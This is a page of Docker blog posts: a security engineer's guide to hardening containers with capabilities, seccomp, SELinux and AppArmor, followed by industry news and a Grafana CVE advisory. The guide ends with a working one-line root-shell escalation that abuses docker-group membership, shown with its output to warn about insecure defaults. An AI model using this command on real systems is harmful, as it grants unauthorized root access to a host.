Jul 11, 2019

Docker Security Considerations Part I


Why Docker Security Matters

It is a fact that Docker has found widespread use over the past years, mostly because it is very easy to use and fast to deploy compared with a full-blown virtual machine. More and more servers are being operated as Docker hosts on which microservices run in containers. From a security point of view, and within the inherent limits of a blog post as a means of communication, two aspects arise.

First, the answer to the already much-discussed question, “Is it secure?” Second, the less analyzed aspect of incident analysis and the changes Docker introduces with respect to known methods and evidence. In order to answer the first question, some key facts about Docker need to be noted. The second aspect, being less examined in general, will be covered in a future post in this mini-series on Docker security.

The basic technology that enables containers in Linux is kernel namespaces. These are what allow the kernel to offer private resources to a process, while hiding the resources of other processes, all without actually creating full guest OSes or kernels per process. One very important fact is that containers run without cgroup limitations by default, but CPU and memory usage can easily be constrained with a few flags. Docker provides a --cgroup-parent option for this purpose; see the official Docker documentation on cgroup-parent. Under no circumstances should containers (or any process) be allowed to run on a production server without such cgroup limitations. In addition, predefined resource limits for containers can help contain cloud infrastructure costs, since consumption is better defined, leading to more targeted purchases.
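As a minimal sketch of what such limits look like in practice (the image name and the specific values are illustrative, not recommendations), CPU and memory can be constrained directly on docker run:

# Cap the container at 512 MB of RAM (no extra swap) and 1.5 CPUs,
# and place it under a parent cgroup of our choosing.
# (--cgroup-parent expects a cgroup path or, with the systemd driver, a *.slice name.)
docker run -d --name limited-app \
    --memory=512m --memory-swap=512m \
    --cpus=1.5 \
    --cgroup-parent=/docker-limited \
    nginx:latest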

Docker applies a default seccomp profile that acts as a system call whitelist; “dangerous” syscalls are excluded from it. If you have a solid understanding of exactly which system calls your containerized process needs, you can customize this profile or write your own to lock out every syscall your container does not need. Also note that custom profiles can be applied on a container-by-container basis. In addition, Linux capabilities are a very useful tool when considering Docker security. Quoting from the man pages:
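For example, a custom profile can be applied to a single container at run time via --security-opt; the profile path and the image below are placeholders for illustration:

# Apply a hand-written whitelist profile to one container only
docker run --rm \
    --security-opt seccomp=/path/to/custom-seccomp.json \
    alpine:latest echo "running under a custom seccomp profile"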

For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.  Capabilities are a per-thread attribute.

In the examples below (the short sketch that follows and the exercise later in this post), we can see the basic syntax for manipulating and auditing capabilities. Perhaps the most secure way to run Docker is with the --user flag (no capabilities), but this is not always possible, since there is no way to add capabilities to a nonzero UID. In cases where capabilities are needed, running as root with --cap-drop ALL and --cap-add to add back the minimum set of capabilities is the most secure practical configuration. Note that since a Docker container is fundamentally just a process, it is simple to enforce these permissions at runtime using the native Linux functionality designed to manage capabilities per process. No “under-the-hood” configuration inside the container is required, whereas it would be required to manipulate the capabilities of groups of processes running in a VM.
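To complement the manipulation examples, here is a hedged sketch of how the resulting capability sets can be audited from outside the container (the image and container names are illustrative; capsh ships with the libcap tools):

# Start a container with everything dropped except CHOWN
docker run -d --name cap-audit --cap-drop ALL --cap-add CHOWN alpine:latest sleep 600

# Read the effective capability bitmask of PID 1 inside the container
docker exec cap-audit grep CapEff /proc/1/status

# Decode a bitmask into capability names on the host, e.g.
capsh --decode=0000000000000001   # -> cap_chown

# Clean up
docker rm -f cap-audit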

A closer look at these capabilities should highlight the need to manage them and give us a better understanding of what is going on. The default list of capabilities available to privileged processes in a Docker container (mostly quoting https://www.redhat.com/en/blog/secure-your-containers-one-weird-trick) is presented below. A complete list of capabilities can be found at http://man7.org/linux/man-pages/man7/capabilities.7.html. At this point we should note that in Compose file format v3 and above, capabilities can be dropped and added per service; e.g.

cap_drop:
  - ALL
cap_add:
  - chown
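For context, a minimal (hypothetical) Compose service carrying the fragment above might look like this; the service and image names are placeholders:

version: "3.4"
services:
  app:
    image: alpine:latest
    command: ["sleep", "600"]
    cap_drop:
      - ALL
    cap_add:
      - CHOWN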

The default list of capabilities available in a Docker container:

chown:

This is described as the ability to make arbitrary changes to file UIDs and GIDs. Unless you are running a shell inside the container and installing packages into it, this should be dropped. If chown is needed, add it, do the work, and then drop it again.

dac_override:

DAC stands for discretionary access control; this capability allows overriding it.

The man pages state that this capability allows root to bypass file read, write, and execute permission checks. It is as odd as it sounds that any application would need this. As noted by Red Hat security experts, “nothing should need this. If your container needs this, it is probably doing something horrible.”

fowner:

fowner conveys the ability to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file. Quite similar to dac_override. It could be needed for docker build, but it should be dropped when the container is in production.

fsetid:

Quoting the man page “don’t clear set-user-ID and set-group-ID mode bits when a file is modified; set the set-group-ID bit for a file whose GID does not match the file system or any of the supplementary GIDs of the calling process.”

So, if you are not running an installation, you probably do not need this capability.

kill

This capability basically means that a root-owned process can send kill signals to non-root processes. If your container runs all processes as root, or its root processes never kill processes running as non-root, you do not need this capability. If you are running systemd as PID 1 inside a container and you want to stop a container running with a different UID, you might need this capability.

setgid

In short, a process with this capability can change its GID to any other GID. Basically allows full group access to all files on the system. If your container processes do not change UIDs/GIDs, they do not need this capability.

setuid

A process with this capability can change its UID to any other UID. Basically, it allows full access to all files on the system. If your container processes do not change UIDs/GIDs, always running as the same UID (preferably non-root), they do not need this capability. Applications that need setuid usually start as root in order to bind to ports below 1024 and then change their UIDs and drop capabilities. Apache binding to port 80 requires net_bind_service, so it usually starts as root; it then needs setuid/setgid to switch to the apache user and drop capabilities. Most containers can safely drop the setuid/setgid capabilities.

setpcap

From the man page description: “Add any capability from the calling thread’s bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.”

A process with this capability can change its current capability set within its bounding set, meaning it could drop capabilities or add capabilities it does not currently have, limited by the capabilities in the bounding set.

net_bind_service

If you have this capability, you can bind to privileged ports (< 1024).

When binding to a port below 1024 is needed, this capability will do the job. For services that listen on a port above 1024, this capability should be dropped. The risk of this capability is a rogue process impersonating a service like sshd and collecting user passwords. Running a container in a different network namespace reduces the risk of this capability, since it would be difficult for the container process to get to the public network interface.

net_raw

This access allows a process to spy on packets on its network. Most container processes would not need this access so it probably should be dropped. Note this would only affect the containers that share the same network that your container process is running on, usually preventing access to the real network. RAW sockets also give an attacker the ability to inject almost anything onto the network.

sys_chroot

This capability allows the use of chroot(). In other words, it allows your processes to chroot into a different rootfs. chroot is probably not used within your container, so it should be dropped.

mknod

If you have this capability, you can create special files using mknod.

This allows your processes to create device nodes. Containers are usually provided all of the device nodes they need in /dev, so this could and should be dropped by default. Almost no containers ever do this, and even fewer containers should do this.

audit_write

With this capability, you can write a message to the kernel auditing log. Few processes attempt to write to the audit log (login programs, su, sudo) and processes inside of the container are probably not trusted. The audit subsystem is not currently namespace-aware, so this should be dropped by default.

setfcap

Finally, the setfcap capability allows you to set file capabilities on a file system. Might be needed for doing installs during builds, but in production, it should probably be dropped.

The following exercise, the output of which is displayed below, illustrates how capabilities are manipulated and demonstrates some of the points made above.

First, we run a container that changes ownership of the root fs:

Status: Image is up to date for centos:latest
john@seceng:~/Documents/docker-sec$
john@seceng:~/Documents/docker-sec$ docker container run --rm centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

We can see that the root user is able to execute this without a problem.

Next, we drop all capabilities from the user in the container, and when we try running the above command again, we can see it fails, as the user no longer has the necessary chown capability (or any other root capabilities):

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Now we add the necessary capability back in:

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all --cap-add chown centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

Dropping all capabilities and adding back only the required ones makes for the most secure containers. An attacker who breaches this container won’t have any root capabilities except chown.

Now, if we try adding chown for a non-root user, the operation fails, since capability manipulation will not, under any circumstances, grant additional capabilities to a process run by a non-root user, as shown in the following output.

john@seceng:~/Documents/docker-sec$ docker container run --rm --user 1000:1000 --cap-add chown centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Another Linux feature that can aid in securing our containers is secure computing mode (seccomp), a Linux kernel feature that restricts the actions (system calls) available within the container. The seccomp() system call operates on the seccomp state of the calling process, and Docker uses this feature to restrict what your application can access.

This feature is available only if Docker has been built with seccomp and the kernel is configured with CONFIG_SECCOMP enabled. More information about seccomp profiles for Docker can be found in Docker’s official documentation. To check if your kernel supports seccomp:

john@seceng:~/Documents/docker-sec$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)
CONFIG_SECCOMP=y
john@seceng:~/Documents/docker-sec$
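As a quick check that the default profile is actually applied to a container (a hedged sketch; the image is illustrative), the Seccomp field of /proc/1/status inside the container reports the current mode:

docker run --rm alpine:latest grep Seccomp /proc/1/status
# Seccomp: 2  -> running under a seccomp filter (e.g. the docker-default profile)
# Seccomp: 0  -> seccomp disabled, e.g. when started with
#                --security-opt seccomp=unconfined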

While capabilities and seccomp restrict access to root capabilities and system calls, SELinux goes a step further and helps protect the host’s file system from malicious code. Default SELinux labels restrict access to directories, and those labels can be changed with the :z and :Z flags when mounting directories, relabeling them for sharing between containers or for private use by a single container, respectively.
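On an SELinux-enabled host, the relabeling mentioned above looks roughly like this (the host path is a placeholder):

# :Z relabels the bind mount for private use by this container only;
# :z would relabel it so that multiple containers can share it.
docker run --rm -v /opt/app/data:/data:Z centos:latest ls -lZ /data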

Additionally, AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. To use it, a system administrator associates an AppArmor security profile with each program. Docker expects to find an AppArmor policy loaded and enforced. Docker automatically generates and loads a default profile for containers named docker-default. On Docker versions 1.13.0 and later, the Docker binary generates this profile in tmpfs and then loads it into the kernel. On Docker versions earlier than 1.13.0, this profile is generated in /etc/apparmor.d/docker instead. It should be noted, though, that this profile is used on containers, not on the Docker daemon. More on AppArmor and Docker can be found at docker’s official documentation.
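On an AppArmor-enabled host, the profile can also be selected explicitly per container; docker-default is the generated default, while my-hardened-profile below is a hypothetical custom profile that would have to be loaded into the kernel first (e.g. with apparmor_parser):

# Explicitly request the default profile (what Docker does anyway)
docker run --rm --security-opt apparmor=docker-default centos:latest uname -a

# Request a custom, previously loaded profile instead
docker run --rm --security-opt apparmor=my-hardened-profile centos:latest uname -a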

Last in this list of facts, but certainly not least, is the default software-defined network firewalling imposed by Docker, and the iptables rules automatically managed by Docker. The Docker networking model was designed around software-defined networks exactly so that Docker could easily manage iptables firewall rules on create and destroy operations of Docker networks and containers. Rather than writing complicated iptables rules explicitly, effective firewalling can be imposed on a containerized data center simply by designing and declaring a sensible software-defined network topology.
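A sketch of what that looks like in practice (network, container, and image names are hypothetical): containers attached only to an internal network get no route to the outside world, and Docker maintains the corresponding iptables rules itself.

# Two user-defined networks: one internal-only, one exposed
docker network create --internal backend
docker network create frontend

# The API service is reachable only from the backend network
docker run -d --name api --network backend myorg/api:latest

# The web tier publishes a port and bridges the two networks
docker run -d --name web --network frontend -p 443:443 myorg/web:latest
docker network connect backend web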

Fundamentally, though by no means exclusively, Docker security concerns arise because the Docker daemon runs as root and Docker is widely used in production systems. With that in mind, and taking into account the facts above, one can easily understand that misconfiguration, bugs, vulnerabilities, and other security issues carry high risk and high impact. The following example, which highlights Docker’s insecure default configuration, is probably the best “teaser” for the next part of this post, in which we will cover some recent vulnerabilities and their mitigation.

john@seceng:~/Documents/docker-sec$ id
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
john@seceng:~/Documents/docker-sec$ whoami
john
john@seceng:~/Documents/docker-sec$ docker run -v /home/${user}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
rootshell-4.4# id
uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
rootshell-4.4# whoami
root
rootshell-4.4# uname -a
Linux seceng 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5 (2019-06-19) x86_64 GNU/Linux
rootshell-4.4# exit
exit
john@seceng:~/Documents/docker-sec$

 

From user to root, in one line. It’s there by default.
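A quick, hedged way to audit this exposure on a host is to check who is in the docker group and who can reach the daemon socket:

# Every member of this group is effectively root on the host
getent group docker

# Ownership and permissions of the Docker daemon socket
stat -c '%U %G %a' /var/run/docker.sock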

John Lionis, Security Engineer | Percona LLC

May 21, 2019

Microsoft makes a push for service mesh interoperability

Service meshes are the hot new thing in the cloud native computing world. At KubeCon, the bi-annual festival of all things cloud native, Microsoft today announced that it is teaming up with a number of companies in this space to create a generic service mesh interface. This will make it easier for developers to adopt the concept without locking them into a specific technology.

In a world where the number of network endpoints continues to increase as developers launch new micro-services, containers and other systems at a rapid clip, they are making the network smarter again by handling encryption, traffic management and other functions so that the actual applications don’t have to worry about that. With a number of competing service mesh technologies, though, including the likes of Istio and Linkerd, developers currently have to choose which one of these to support.

“I’m really thrilled to see that we were able to pull together a pretty broad consortium of folks from across the industry to help us drive some interoperability in the service mesh space,” Gabe Monroy, Microsoft’s lead product manager for containers and the former CTO of Deis, told me. “This is obviously hot technology — and for good reasons. The cloud-native ecosystem is driving the need for smarter networks and smarter pipes and service mesh technology provides answers.”

The partners here include Buoyant, HashiCorp, Solo.io, Red Hat, AspenMesh, Weaveworks, Docker, Rancher, Pivotal, Kinvolk and VMware. That’s a pretty broad coalition, though it notably doesn’t include cloud heavyweights like Google, the company behind Istio, and AWS.

“In a rapidly evolving ecosystem, having a set of common standards is critical to preserving the best possible end-user experience,” said Idit Levine, founder and CEO of Solo.io. “This was the vision behind SuperGloo — to create an abstraction layer for consistency across different meshes, which led us to the release of Service Mesh Hub last week. We are excited to see service mesh adoption evolve into an industry-level initiative with the SMI specification.”

For the time being, the interoperability features focus on traffic policy, telemetry and traffic management. Monroy argues that these are the most pressing problems right now. He also stressed that this common interface still allows the different service mesh tools to innovate and that developers can always work directly with their APIs when needed. He also stressed that the Service Mesh Interface (SMI), as this new specification is called, does not provide any of its own implementations of these features. It only defines a common set of APIs.

Currently, the most well-known service mesh is probably Istio, which Google, IBM and Lyft launched about two years ago. SMI may just bring a bit more competition to this market since it will allow developers to bet on the overall idea of a service mesh instead of a specific implementation.

In addition to SMI, Microsoft also today announced a couple of other updates around its cloud-native and Kubernetes services. It announced the first alpha of the Helm 3 package manager, for example, as well as the 1.0 release of its Kubernetes extension for Visual Studio Code and the general availability of its AKS virtual nodes, using the open source Virtual Kubelet project.

May 08, 2019

Steve Singh stepping down as Docker CEO

TechCrunch has learned that Docker CEO Steve Singh will be stepping down after two years at the helm, and former Hortonworks CEO Rob Bearden will be taking over. An email announcement went out this morning to Docker employees.

People close to the company confirmed that Singh will be leaving the CEO position, staying on the job for several months to help Bearden with the transition. He will then remain with the organization in his role as chairman of the board. They indicated that Bearden has been working closely with Singh over the last several months as a candidate to join the board and as a consultant to the executive team.

Singh clicked with him and viewed him as a possible successor, especially given his background with leadership positions at several open-source companies, including taking Hortonworks public before selling to Cloudera last year. Singh apparently saw someone who could take the company to the next level as he moved on. As one person put it, he was tired of working 75 hours a week, but he wanted to leave the company in the hands of a capable steward.

Last week in an interview at DockerCon, the company’s annual customer conference in San Francisco, Singh appeared tired, but a leader who was confident in his position and who saw a bright future for his company. He spoke openly about his leadership philosophy and his efforts to lift the company from the doldrums it was in when he took over two years prior, helping transform it from a mostly free open-source offering into a revenue-generating company with 750 paying enterprise customers.

In fact, he told me that under his leadership the company was on track to become free cash flow positive by the end of this fiscal year, a step he said would mean that Docker would no longer need to seek outside capital. He even talked of the company eventually going public.

Apparently, he felt it was time to pass the torch before the company took those steps, saw a suitable successor in Bearden and offered him the position. While it might have made more sense to announce this at DockerCon with the spotlight focused on the company, it was not a done deal yet by the time the conference was underway in San Francisco, people close to the company explained.

Docker took a $92 million investment last year, which some saw as a sign of continuing struggles for the company, but Singh said he took the money to continue to invest in building revenue-generating enterprise products, some of which were announced at DockerCon last week. He indicated that the company would likely not require any additional investment moving forward.

As for Bearden, he is an experienced executive with a history of successful exits. In addition to his experience at Hortonworks, he was COO at SpringSource, a developer tool suite that was sold to VMware for $420 million in 2009 (and is now part of Pivotal). He was also COO at JBoss, an open-source middleware company acquired by Red Hat in 2006.

Whether he will do the same with Docker remains to be seen, but as the new CEO, it will be up to him to guide the company moving forward to the next steps in its evolution, whether that eventually results in a sale or the IPO that Singh alluded to.

Email to staff from Steve Singh:

Note: Docker has now confirmed this story in a press release.

Apr 30, 2019

Docker looks to partners and packages to ease container implementation

Docker appears to be searching for ways to simplify the core value proposition of the company — creating, deploying and managing containers. While most would agree it has revolutionized software development, like many technology solutions, it takes a certain level of expertise and staffing to pull off. At DockerCon, the company’s customer conference taking place this week in San Francisco, Docker announced several ways it could help customers with the tough parts of implementing a containerized solution.

For starters, the company announced a beta of Docker Enterprise 3.0 this morning. That update is all about making life simpler for developers. As companies move to containerized environments, it’s a challenge for all but the largest organizations like Google, Amazon and Facebook, all of whom have massive resource requirements and correspondingly large engineering teams.

Most companies don’t have that luxury though, and Docker recognizes if it wants to bring containerization to a larger number of customers, it has to create packages and programs that make it easier to implement.

Docker Enterprise 3.0 is a step toward providing a solution that lets developers concentrate on the development aspects, while working with templates and other tools to simplify the deployment and management side of things.

The company sees customers struggling with implementation and how to configure and build a containerized workflow, so it is working with systems integrators to help smooth out the difficult parts. Today, the company announced Docker Enterprise as a Service, with the goal of helping companies through the process of setting up and managing a containerized environment, using the Docker stack and adjacent tooling like Kubernetes.

The service provider will take care of operational details like managing upgrades, rolling out patches, doing backups and undertaking capacity planning — all of those operational tasks that require a high level of knowledge around enterprise container stacks.

Capgemini will be the first go-to-market partner. “Capgemini has a combination of automation, technology tools, as well as services on the back end that can manage the installation, provisioning and management of the enterprise platform itself in cases where customers don’t want to do that, and they want to pay someone to do that for them,” Scott Johnston, chief product officer at Docker told TechCrunch.

The company has released tools in the past to help customers move legacy applications into containers without a lot of fuss. Today, the company announced a solution bundle called Accelerate Greenfield, a set of tools designed to help customers get up and running as container-first development companies.

“This is for those organizations that may be a little further along. They’ve gone all-in on containers committing to taking a container-first approach to new application development,” Johnston explained. He says this could be cloud native microservices or even a LAMP stack application, but the point is that they want to put everything in containers on a container platform.

Accelerate Greenfield is designed to do that. “They get the benefits where they know that from the developer to the production end point, it’s secure. They have a single way to define it all the way through the life cycle. They can make sure that it’s moving quickly, and they have that portability built into the container format, so they can deploy [wherever they wish],” he said.

These programs and products are all about providing a level of hand-holding, either by playing a direct consultative role, working with a systems integrator or providing a set of tools and technologies to walk the customer through the containerization life cycle. Whether they provide a sufficient level of help that customers require is something we will learn over time as these programs mature.

Apr 30, 2019

Docker updates focus on simplifying containerization for developers

Over the last five years, Docker has become synonymous with software containers, but that doesn’t mean every developer understands the technical details of building, managing and deploying them. At DockerCon this week, the company’s customer conference taking place in San Francisco, it announced new tools that have been designed to make it easier for developers, who might not be Docker experts, to work with containers.

As the technology has matured, the company has seen the market broaden, but in order to take advantage of that, it needs to provide a set of tools that make it easier to work with. “We’ve found that customers typically have a small cadre of Docker experts, but there are hundreds, if not thousands, of developers who also want to use Docker. And we reasoned, how can we help them get productive very, very quickly, without them having to become Docker experts,” Scott Johnston, chief product officer at Docker, told TechCrunch.

To that end, it announced a beta of Docker Enterprise 3.0, which includes several key components. For starters, Docker Desktop Enterprise lets IT set up a Docker environment with the kind of security and deployment templates that make sense for each customer. The developers can then pick the templates that make sense for their implementations, while conforming with compliance and governance rules in the company.

“These templates already have IT-approved container images, and have IT-approved configuration settings. And what that means is that IT can provide these templates through these visual tools that allow developers to move fast and choose the ones they want without having go back for approval,” Johnston explained.

The idea is to let the developers concentrate on building applications, and the templates provide all the Docker tooling pre-built and ready to go, so they don’t have to worry about all of that.

Another piece of this is Docker Applications, which allows developers to build complex containerized applications as a single package and deploy them to any infrastructure they wish — on-prem or in the cloud. Five years ago, when Docker really got started with containers, they were a simpler idea, often involving just a single one, but as developers broke down those larger applications into microservices, it created a new level of difficulty, especially for operations that had to deploy these increasingly large sets of application containers.

“Operations can now programmatically change the parameters for the containers, depending on the environments, without having to go in and change the application. So you can imagine that ability lowers the friction of having to manage all these files in the first place,” he said.

The final piece of that is the orchestration layer, and the popular way to handle that today is with Kubernetes. Docker has created its own flavor of Kubernetes, based on the open-source tool. Johnston says, as with the other two pieces, the goal here is to take a powerful tool like Kubernetes and reduce the overall complexity associated with running it, while making it fully compatible with a Docker environment.

For that, Docker announced Docker Kubernetes Service (DKS), which has been designed with Docker users in mind, including support for Docker Compose, a scripting tool that has been popular with Docker users. While you are free to use any flavor of Kubernetes you wish, Docker is offering DKS as a Docker-friendly version for developers.

All of these components have one thing in common besides being part of Docker Enterprise 3.0. They are trying to reduce the complexity associated with deploying and managing containers and to abstract away the most difficult parts, so that developers can concentrate on developing without having to worry about connecting to the technical underpinnings of building and deploying containers. At the same time, Docker is trying to make it easier for the operations team to manage it all. That is the goal, at least. In the end, DevOps teams will be the final judges of how well Docker has done, once these tools become generally available later this year.

The Docker Enterprise 3.0 beta will be available later this quarter.

Apr 24, 2019

Docker developers can now build Arm containers on their desktops

Docker and Arm today announced a major new partnership that will see the two companies collaborate in bringing improved support for the Arm platform to Docker’s tools.

The main idea here is to make it easy for Docker developers to build their applications for the Arm platform right from their x86 desktops and then deploy them to the cloud (including the Arm-based AWS EC2 A1 instances), edge and IoT devices. Developers will be able to build their containers for Arm just like they do today, without the need for any cross-compilation.

This new capability, which will work for applications written in JavaScript/Node.js, Python, Java, C++, Ruby, .NET core, Go, Rust and PHP, will become available as a tech preview next week, when Docker hosts its annual North American developer conference in San Francisco.

Typically, developers would have to build the containers they want to run on the Arm platform on an Arm-based server. With this system, which is the first result of this new partnership, Docker essentially emulates an Arm chip on the PC for building these images.

“Overnight, the 2 million Docker developers that are out there can use the Docker commands they already know and become Arm developers,” Docker EVP of Strategic Alliances David Messina told me. “Docker, just like we’ve done many times over, has simplified and streamlined processes and made them simpler and accessible to developers. And in this case, we’re making x86 developers on their laptops Arm developers overnight.”

Given that cloud-based Arm servers like Amazon’s A1 instances are often significantly cheaper than x86 machines, users can achieve some immediate cost benefits by using this new system and running their containers on Arm.

For Docker, this partnership opens up new opportunities, especially in areas where Arm chips are already strong, including edge and IoT scenarios. Arm, similarly, is interested in strengthening its developer ecosystem by making it easier to develop for its platform. The easier it is to build apps for the platform, the more likely developers are to then run them on servers that feature chips from Arm’s partners.

“Arm’s perspective on the infrastructure really spans all the way from the endpoint, all the way through the edge to the cloud data center, because we are one of the few companies that have a presence all the way through that entire path,” Mohamed Awad, Arm’s VP of Marketing, Infrastructure Line of Business, said. “It’s that perspective that drove us to make sure that we engage Docker in a meaningful way and have a meaningful relationship with them. We are seeing compute and the infrastructure sort of transforming itself right now from the old model of centralized compute, general purpose architecture, to a more distributed and more heterogeneous compute system.”

Developers, however, Awad rightly noted, don’t want to have to deal with this complexity, yet they also increasingly need to ensure that their applications run on a wide variety of platforms and that they can move them around as needed. “For us, this is about enabling developers and freeing them from lock-in on any particular area and allowing them to choose the right compute for the right job that is the most efficient for them,” Awad said.

Messina noted that the promise of Docker has long been to remove the dependence of applications from the infrastructure on which they run. Adding Arm support simply extends this promise to an additional platform. He also stressed that the work on this was driven by the company’s enterprise customers. These are the users who have already set up their systems for cloud-native development with Docker’s tools — at least for their x86 development. Those customers are now looking at developing for their edge devices, too, and that often means developing for Arm-based devices.

Awad and Messina both stressed that developers really don’t have to learn anything new to make this work. All of the usual Docker commands will just work.

Dec 04, 2018

Microsoft and Docker team up to make packaging and running cloud-native applications easier

Microsoft and Docker today announced a new joint open-source project, the Cloud Native Application Bundle (CNAB), that aims to make the lifecycle management of cloud-native applications easier. At its core, the CNAB is nothing but a specification that allows developers to declare how an application should be packaged and run. With this, developers can define their resources and then deploy the application to anything from their local workstation to public clouds.

The specification was born inside Microsoft, but as the team talked to Docker, it turns out that the engineers there were working on a similar project. The two decided to combine forces and launch the result as a single open-source project. “About a year ago, we realized we’re both working on the same thing,” Microsoft’s Gabe Monroy told me. “We decided to combine forces and bring it together as an industry standard.”

As part of this, Microsoft is launching its own reference implementation of a CNAB client today. Duffle, as it’s called, allows users to perform all the usual lifecycle steps (install, upgrade, uninstall), create new CNAB bundles and sign them cryptographically. Docker is working on integrating CNAB into its own tools, too.

Microsoft also today launched a Visual Studio extension for building and hosting these bundles, as well as an example implementation of a bundle repository server and an Electron installer that lets you install a bundle with the help of a GUI.

Now it’s worth noting that we’re talking about a specification and reference implementations here. There is obviously a huge ecosystem of lifecycle management tools on the market today that all have their own strengths and weaknesses. “We’re not going to be able to unify that tooling,” said Monroy. “I don’t think that’s a feasible goal. But what we can do is we can unify the model around it, specifically the lifecycle management experience as well as the packaging and distribution experience. That’s effectively what Docker has been able to do with the single-workload case.”

Over time, Microsoft and Docker would like for the specification to end up in a vendor-neutral foundation. Which one remains to be seen, though the Open Container Initiative seems like the natural home for a project like this.

Nov 20, 2018

How CVE-2018-19039 Affects Percona Monitoring and Management

Grafana Labs has released an important security update, and as you’re aware, PMM uses Grafana internally. You’re probably curious whether this issue affects you. CVE-2018-19039, “File Exfiltration vulnerability Security fix,” covers a recently discovered security flaw that allows any Grafana user with Editor or Admin permissions to have read access to the filesystem, performed with the same privileges as the Grafana process has.

We have good news: if you’re running PMM 1.10.0 or later (released April 2018), you’re not affected by this security issue.

The reason you’re not affected is an interesting one. CVE-2018-19039 relates to Grafana component PhantomJS, which Percona omitted when we changed how we build the version of Grafana embedded in Percona Monitoring and Management. We became aware of this via bug PMM-2837 when we discovered images do not render.

We fixed this image rendering issue and applied the required security update in 1.17. This ensures PMM is not vulnerable to CVE-2018-19039.

Users of PMM who are running release 1.1.0 (February 2017) through 1.9.1 (April 2018) are advised to upgrade ASAP.  If you cannot immediately upgrade, we advise that you take two steps:

  1. Convert all Grafana users to Viewer role
  2. Remove all Dashboards that contain text panels

How to Get PMM Server

PMM is available for installation using three methods:

Nov 15, 2018

Docker inks partnership with MuleSoft as Salesforce takes a strategic stake

Docker and MuleSoft have announced a broad deal to sell products together and integrate their platforms. As part of it, Docker is getting an investment from Salesforce, the CRM giant that acquired MuleSoft for $6.5 billion last spring.

Salesforce is not disclosing the size of the stake it’s taking in Docker, but it is strategic: it will see its newly acquired MuleSoft working with Docker to connect containerized applications to multiple data sources across an organization. Putting the two companies together, you can connect these containerized applications to multiple data sources in a modern way, even with legacy applications.

The partnership is happening on multiple levels and includes technical integration to help customers more easily use the two toolsets together. It also includes a sales agreement to invite each company’s sales team when it makes sense, and to work with systems integrators and ISVs, who help companies put these kind of complex solutions to work inside large organizations.

Docker chief product officer Scott Johnston said it was really about bringing together two companies whose missions were aligned with what they were hearing from customers. That involves tapping into some broad trends around getting more out of their legacy applications and a growing desire to take an API-driven approach to developer productivity, while getting additional value out of their existing data sources. “Both companies have been working separately on these challenges for the last several years, and it just made sense as we listen to the market and listen to customers that we joined forces,” Johnston told TechCrunch.

Uri Sarid, MuleSoft’s CTO, agrees that customers have been using both products and it called for a more formal arrangement. “We have joint customers and the partnership will be fortifying that. So that’s a great motion, but we believe in acceleration. And so if there are things that we can do, and we now have plans for what we will do to make that even faster, to make that even more natural and built-in, we can accelerate the motion to this. Before, you had to think about these two concerns separately, and we are working on interoperability that makes you not have to think about them separately,” he explained.

This announcement comes at a time of massive consolidation in the enterprise. In the last couple of weeks, we have seen IBM buying Red Hat for $34 billion, SAP acquiring Qualtrics for $8 billion and Vista Equity Partners scooping up Apptio for $1.94 billion. Salesforce acquired MuleSoft earlier this year in its own mega deal in an effort to bridge the gap between data in the cloud and on-prem.

The final piece of today’s announcement is that investment from Salesforce Ventures. Johnston would not say how much the investment was for, but did say it was about aligning the two partners.

Docker had raised almost $273 million before today’s announcement. It’s possible it could be looking for a way to exit, and with the trend toward enterprise consolidation, Salesforce’s investment may be a way to test the waters for just that. If it seems like an odd match, remember that Salesforce bought Heroku in 2010 for $212 million.
